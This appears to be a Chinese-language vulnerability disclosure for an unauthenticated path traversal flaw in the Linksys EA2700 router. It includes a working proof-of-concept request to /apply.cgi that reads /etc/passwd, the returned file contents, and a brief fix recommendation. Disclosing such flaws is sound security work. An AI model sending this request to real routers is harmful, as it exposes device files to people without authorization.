简要描述:
此路由器软件从来没有进行安全渗透测试,在未登录情况下可以很容易获取路由器/etc/passwd文件或其他配置文件,
Linksys EA2700任意文件遍历漏洞漏洞预警
。详细说明:
此路由器软件从来没有进行安全渗透测试,在未登录情况下可以很容易获取路由器/etc/passwd文件或其他配置文件。
漏洞证明:
POST /apply.cgi
Host: 192.168.1.1
submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd
====>
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin
修复方案:
通知厂商对其路由软件进行严格安全测试,并修复,